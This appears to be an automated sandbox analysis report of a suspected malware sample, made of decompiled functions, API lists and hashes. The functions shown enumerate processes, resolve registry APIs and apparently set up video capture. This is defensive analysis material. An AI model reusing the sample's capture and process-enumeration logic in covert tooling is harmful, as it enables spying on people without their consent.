                                                                    • Instruction Fuzzy Hash: 7F51117260020AAFDB208F65CD41EFF3AA9EF44750F15026AFD04E7250D7B8DCA09668
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20D24 Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E02D20D24(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				int _t58;
				int _t74;
				int _t78;
				int _t90;
				void* _t92;
				void* _t113;
				void* _t114;
				void* _t116;
				void* _t118;
				signed int _t120;
				void* _t121;
				signed int _t123;
				void* _t124;
				intOrPtr* _t125;
				void* _t126;

				_t126 = __eflags;
				_t113 = __edx;
				_t92 = __ecx;
				E02D11052( &_v600, 0, 0x228);
				_t125 = _t124 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E02D116E3( &_v44, _t126);
				_t114 = CreateToolhelp32Snapshot(2, 0);
				if(_t114 == 0xffffffff) {
					L14:
					E02D1131A(_t92, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t120 =  *(_t54 - 4);
						_t116 = _t120 * 0xc + _t54;
						__eflags = _t120;
						if(_t120 != 0) {
							do {
								_t116 = _t116 - 0xc;
								E02D11416(_t116);
								_t120 = _t120 - 1;
								__eflags = _t120;
							} while (_t120 != 0);
						}
					}
				} else {
					_push( &_v604);
					_t58 = Process32FirstW(_t114);
					_t128 = _t58;
					if(_t58 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E02D132FF( &_v12, _t113,  &_v568);
							_t121 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t121 - 0xffffffff;
							if(_t121 == 0xffffffff) {
								E02D13437( &_v8, E02D135E5( &_v28, "-"));
								E02D15EA5(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E02D11052( &_v1644, 0, 0x410);
								_t125 = _t125 + 0xc;
								_t78 =  &_v1644;
								__imp__GetModuleFileNameExW(_t121, 0, _t78, 0x208);
								__eflags = _t78;
								if(_t78 == 0) {
									E02D13437( &_v8, E02D135E5( &_v24, "-"));
									E02D15EA5(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E02D13437( &_v8, E02D135E5( &_v20,  &_v1644));
									E02D15EA5(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t121);
							}
							_t125 = _t125 - 0xc;
							_t122 = _t125;
							 *_t125 = _v16;
							E02D1362D(_t122 + 4,  &_v12);
							E02D1362D(_t122 + 8,  &_v8);
							E02D115C0( &_v44);
							E02D11416( &_v16);
							_t74 = Process32NextW(_t114,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t74;
						} while (__eflags != 0);
						CloseHandle(_t114);
						goto L14;
					} else {
						CloseHandle(_t114);
						E02D1131A(_t92, _t128,  &_v44);
						_t90 = _v44;
						if(_t90 != 0) {
							_t123 =  *(_t90 - 4);
							_t118 = _t123 * 0xc + _t90;
							if(_t123 != 0) {
								do {
									_t118 = _t118 - 0xc;
									E02D11416(_t118);
									_t123 = _t123 - 1;
								} while (_t123 != 0);
							}
						}
					}
				}
				return _t92;
			}



































                                                                    0x02d20d24
                                                                    0x02d20d24
                                                                    0x02d20d3f
                                                                    0x02d20d41
                                                                    0x02d20d46
                                                                    0x02d20d49
                                                                    0x02d20d56
                                                                    0x02d20d5b
                                                                    0x02d20d5c
                                                                    0x02d20d5f
                                                                    0x02d20d62
                                                                    0x02d20d70
                                                                    0x02d20d75
                                                                    0x02d20efd
                                                                    0x02d20f03
                                                                    0x02d20f08
                                                                    0x02d20f0b
                                                                    0x02d20f0d
                                                                    0x02d20f0f
                                                                    0x02d20f15
                                                                    0x02d20f17
                                                                    0x02d20f19
                                                                    0x02d20f1b
                                                                    0x02d20f1b
                                                                    0x02d20f20
                                                                    0x02d20f25
                                                                    0x02d20f25
                                                                    0x02d20f25
                                                                    0x02d20f1b
                                                                    0x02d20f19
                                                                    0x02d20d7b
                                                                    0x02d20d81
                                                                    0x02d20d83
                                                                    0x02d20d89
                                                                    0x02d20d8b
                                                                    0x02d20dce
                                                                    0x02d20dd7
                                                                    0x02d20de1
                                                                    0x02d20de4
                                                                    0x02d20de7
                                                                    0x02d20dfe
                                                                    0x02d20e00
                                                                    0x02d20e03
                                                                    0x02d20e9a
                                                                    0x02d20ea2
                                                                    0x02d20ea7
                                                                    0x02d20ea7
                                                                    0x02d20ea7
                                                                    0x02d20e09
                                                                    0x02d20e17
                                                                    0x02d20e1c
                                                                    0x02d20e1f
                                                                    0x02d20e2e
                                                                    0x02d20e34
                                                                    0x02d20e36
                                                                    0x02d20e6f
                                                                    0x02d20e77
                                                                    0x02d20e7c
                                                                    0x02d20e7c
                                                                    0x02d20e7c
                                                                    0x02d20e38
                                                                    0x02d20e4b
                                                                    0x02d20e53
                                                                    0x02d20e58
                                                                    0x02d20e58
                                                                    0x02d20e81
                                                                    0x02d20e81
                                                                    0x02d20eae
                                                                    0x02d20eb1
                                                                    0x02d20eb3
                                                                    0x02d20ebc
                                                                    0x02d20ec8
                                                                    0x02d20ed0
                                                                    0x02d20ed8
                                                                    0x02d20ee5
                                                                    0x02d20eeb
                                                                    0x02d20eed
                                                                    0x02d20eee
                                                                    0x02d20eee
                                                                    0x02d20ef7
                                                                    0x00000000
                                                                    0x02d20d8d
                                                                    0x02d20d8e
                                                                    0x02d20d9a
                                                                    0x02d20d9f
                                                                    0x02d20da4
                                                                    0x02d20daa
                                                                    0x02d20db0
                                                                    0x02d20db4
                                                                    0x02d20dba
                                                                    0x02d20dba
                                                                    0x02d20dbf
                                                                    0x02d20dc4
                                                                    0x02d20dc4
                                                                    0x02d20dc9
                                                                    0x02d20db4
                                                                    0x02d20da4
                                                                    0x02d20d8b
                                                                    0x02d20f30

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D20D6A
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02D20D83
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D20D8E
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 02D20DF8
                                                                    • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 02D20E2E
                                                                    • CloseHandle.KERNEL32(00000000,00000000,02D24C14), ref: 02D20E81
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D20EE5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D20EF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                                                    • String ID:
                                                                    • API String ID: 3514491001-0
                                                                    • Opcode ID: bbc234f1daeb9f4f1a3767f29b40e3da66314736ace99ab827bdbe7982b83640
                                                                    • Instruction ID: e1144130051f66632618e8846c22cef7e489149530f4961acb94c3ba665beb14
                                                                    • Opcode Fuzzy Hash: bbc234f1daeb9f4f1a3767f29b40e3da66314736ace99ab827bdbe7982b83640
                                                                    • Instruction Fuzzy Hash: DB519172D01129ABDB10EBA4DC88AEEBB79EF64715F010565E505B3780EB309E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D22D0A Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 53%
                                                                    			E02D22D0A(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t1 = _t76 + 0x18; // 0x70d040
				_t111 = _t1;
				__imp__CoCreateInstance(0x2d245a0, 0, 1, 0x2d27410, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t2 = _t76 + 0x1c; // 0x70d044
					_t104 = _t2;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x2d24580, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t4 = _t76 + 0x20; // 0x70d048
						_t112 = _t4;
						if(_t112 != 0) {
							_t49 = E02D22A6B(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t6 = _t76 + 0x24; // 0x70d04c
							_t113 = _t6;
							__imp__CoCreateInstance(0x2d245f0, 0, 1, 0x2d27400, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E02D11052( &_v128, 0, 0x48);
								_t58 =  *((intOrPtr*)(_t76 + 0x18));
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E02D22688();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E02D226A4();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t85 =  *((intOrPtr*)(_t76 + 0x24));
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
										if(_t49 >= 0) {
											_t60 =  *((intOrPtr*)(_t76 + 0x18));
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E02D1102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E02D224EB( &_v200);
											_t107 = _a4;
											E02D22B2A(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											E02D15CA3(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
											E02D225D8( *_t76);
											_t49 = E02D22688();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t71 =  *((intOrPtr*)(_t76 + 0x18));
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t96 =  *((intOrPtr*)(_t76 + 0x24));
												_t47 = _t76 + 0x34; // 0x70d05c
												_t118 = _t47;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x2d245c0, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}
































                                                                    0x02d22d18
                                                                    0x02d22d1a
                                                                    0x02d22d20
                                                                    0x02d22d20
                                                                    0x02d22d32
                                                                    0x02d22d38
                                                                    0x02d22d3c
                                                                    0x02d22d44
                                                                    0x02d22d44
                                                                    0x02d22d4e
                                                                    0x02d22d50
                                                                    0x02d22d54
                                                                    0x02d22d5d
                                                                    0x02d22d60
                                                                    0x02d22d60
                                                                    0x02d22d65
                                                                    0x02d22d6c
                                                                    0x02d22d6c
                                                                    0x02d22d74
                                                                    0x02d22d7a
                                                                    0x02d22d7a
                                                                    0x02d22d8c
                                                                    0x02d22d92
                                                                    0x02d22d96
                                                                    0x02d22da7
                                                                    0x02d22daa
                                                                    0x02d22db6
                                                                    0x02d22dc1
                                                                    0x02d22dcb
                                                                    0x02d22dd1
                                                                    0x02d22dd7
                                                                    0x02d22dda
                                                                    0x02d22ddb
                                                                    0x02d22ddc
                                                                    0x02d22de5
                                                                    0x02d22de6
                                                                    0x02d22de7
                                                                    0x02d22de8
                                                                    0x02d22deb
                                                                    0x02d22df1
                                                                    0x02d22df6
                                                                    0x02d22dfb
                                                                    0x02d22e04
                                                                    0x02d22e09
                                                                    0x02d22e0e
                                                                    0x02d22e14
                                                                    0x02d22e1e
                                                                    0x02d22e23
                                                                    0x02d22e29
                                                                    0x02d22e36
                                                                    0x02d22e4b
                                                                    0x02d22e59
                                                                    0x02d22e61
                                                                    0x02d22e6d
                                                                    0x02d22e78
                                                                    0x02d22e88
                                                                    0x02d22e8b
                                                                    0x02d22e8f
                                                                    0x02d22e97
                                                                    0x02d22e9c
                                                                    0x02d22ea1
                                                                    0x02d22ea3
                                                                    0x02d22ead
                                                                    0x02d22eb0
                                                                    0x02d22eb3
                                                                    0x02d22eb3
                                                                    0x02d22ebf
                                                                    0x02d22ec1
                                                                    0x02d22ec5
                                                                    0x00000000
                                                                    0x02d22eca
                                                                    0x02d22ec5
                                                                    0x02d22ea1
                                                                    0x02d22e23
                                                                    0x02d22e0e
                                                                    0x02d22dfb
                                                                    0x02d22d96
                                                                    0x02d22d74
                                                                    0x02d22d54
                                                                    0x02d22ed1

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 02D22D1A
                                                                    • CoCreateInstance.OLE32(02D245A0,00000000,00000001,02D27410,0070D040,?,?), ref: 02D22D32
                                                                    • CoCreateInstance.OLE32(02D245F0,00000000,00000001,02D27400,0070D04C,?,?,02D24580,0070D044,?,?), ref: 02D22D8C
                                                                      • Part of subcall function 02D22A6B: CoCreateInstance.OLE32(02D245E0,00000000,00000001,02D273F0,?,7426B690,00000000,00000000,?,?,02D227B0), ref: 02D22A99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInstance$Initialize
                                                                    • String ID: Grabber$Source$vids
                                                                    • API String ID: 1108742289-4200688928
                                                                    • Opcode ID: 73d72b2c21ec5cf7f51d0fbd204cb1970cbde5612e015299e0208a2fb5328136
                                                                    • Instruction ID: e55e59115a2d45dd0005ac15f10e47502210d918922dfc5d0829cd46000ec4eb
                                                                    • Opcode Fuzzy Hash: 73d72b2c21ec5cf7f51d0fbd204cb1970cbde5612e015299e0208a2fb5328136
                                                                    • Instruction Fuzzy Hash: 86518F71600211AFDB24DF64D888E9A7B66EF59708F114498FD05AF395CB71EC09CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414454 Relevance: 10.7, APIs: 7, Instructions: 162fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(0070F938,00000000,00000000,?,?,?,?,?,?,?,00414BE0,00420128,00000000,00000000,00000000,00000020), ref: 00414496
                                                                    • __fassign.LIBCMT ref: 00414515
                                                                    • __fassign.LIBCMT ref: 00414534
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00414561
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00414BE0), ref: 00414581
                                                                    • WriteFile.KERNEL32(?,00420128,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00414BE0), ref: 004145BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 0d7e2aa4922963ec6b0bf0500839cb03b98d2c100dcd9a864fef331573b17274
                                                                    • Instruction ID: 0dc69974e0fe8f98dd72314cdf29b93021d07047fc96cb62d40f10d66d68c120
                                                                    • Opcode Fuzzy Hash: 0d7e2aa4922963ec6b0bf0500839cb03b98d2c100dcd9a864fef331573b17274
                                                                    • Instruction Fuzzy Hash: 4F51C371E00249AFDB10CFA8D881AEEBBF5EF49304F14412AE955E7251D734D981CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406DE0 Relevance: 10.6, APIs: 7, Instructions: 108windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000000D0), ref: 00406E00
                                                                    • 73CCAC50.USER32(00000000), ref: 00406E11
                                                                    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00406E39
                                                                    • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00406E75
                                                                    • SendMessageA.USER32(00000000,00000189,00000000,?), ref: 00406E9B
                                                                    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00406EBC
                                                                    • SendMessageA.USER32(00000000,00000194,?,00000000), ref: 00406EE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ExtentPoint32Text$Item
                                                                    • String ID:
                                                                    • API String ID: 1222181357-0
                                                                    • Opcode ID: 0836105132f59b06c05857fe69f5962dc125477e940a804e17d94a396800be2d
                                                                    • Instruction ID: eb716e147e04edd7a3654e62f5a02555833c4f89eea1d5a622854399e92414ef
                                                                    • Opcode Fuzzy Hash: 0836105132f59b06c05857fe69f5962dc125477e940a804e17d94a396800be2d
                                                                    • Instruction Fuzzy Hash: 4B31A07550030AEFDB10DF64DC48AEEBBB9EF04701F21413AE916A7291DB35A915CFA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403BC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00000000,?,00000000,?,004035C8,00000000,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00000000), ref: 00403BE4
                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00403C02
                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,0002001F,00000000,00000000,00000000,00000000,?,00000000,?,004035C8,00000000), ref: 00403C55
                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,004035C8,00000000,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00000000,0002001F,00000000), ref: 00403C74
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseCreateHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedA
                                                                    • API String ID: 1765684683-1184998024
                                                                    • Opcode ID: dcc5e64c6b3777e674a55b89a9c114cc423992a87cda2b609c91c920cb1a19ba
                                                                    • Instruction ID: 866be5843eed69adde56d4dbd30a5995d225e9e3e304a0076bdf1e6697d62adb
                                                                    • Opcode Fuzzy Hash: dcc5e64c6b3777e674a55b89a9c114cc423992a87cda2b609c91c920cb1a19ba
                                                                    • Instruction Fuzzy Hash: D8217E32200209ABEF118F59DC44FDB7F69EF08311F10802AF905E6290D735DA61DBA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DEA3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: ad16ebcd66695fd72900a4f6a2c4c30d4c6a36bdafda2fd599ff06f587a77f11
                                                                    • Instruction ID: aea426922bb4c808b796eaa5bd78a7be2eb3a34cc55e5548ac7260a9838bbbd5
                                                                    • Opcode Fuzzy Hash: ad16ebcd66695fd72900a4f6a2c4c30d4c6a36bdafda2fd599ff06f587a77f11
                                                                    • Instruction Fuzzy Hash: D121F631E01616A7C7229BA48C80A6B7B58AF45760F258176F907B73D0DB38EC09C5DC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004050D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00000000,?,00000000,?,004035AB,00000000,00000000,0002001F,00000000,00000000,?,?), ref: 004050F4
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00405112
                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,?,00000000,?,004035AB,00000000,00000000,0002001F,00000000,00000000), ref: 0040514B
                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,004035AB,00000000,00000000,0002001F,00000000,00000000,?,?), ref: 0040515E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                    • API String ID: 823179699-496252237
                                                                    • Opcode ID: 8fc867ec5f2887fec05e002e632ac6f0428cbb96421cda63c08771dcea01ad63
                                                                    • Instruction ID: a1ed4ca89e83715be12185d689ef569ee4b10421bda04d7049f422d41903f463
                                                                    • Opcode Fuzzy Hash: 8fc867ec5f2887fec05e002e632ac6f0428cbb96421cda63c08771dcea01ad63
                                                                    • Instruction Fuzzy Hash: 93118431B00609FBDB108F59DC44B9BBBA9EB44350F14807AF904EA290D775DD50DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004113E4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004113AC: _free.LIBCMT ref: 004113D1
                                                                    • _free.LIBCMT ref: 00411432
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0041143D
                                                                    • _free.LIBCMT ref: 00411448
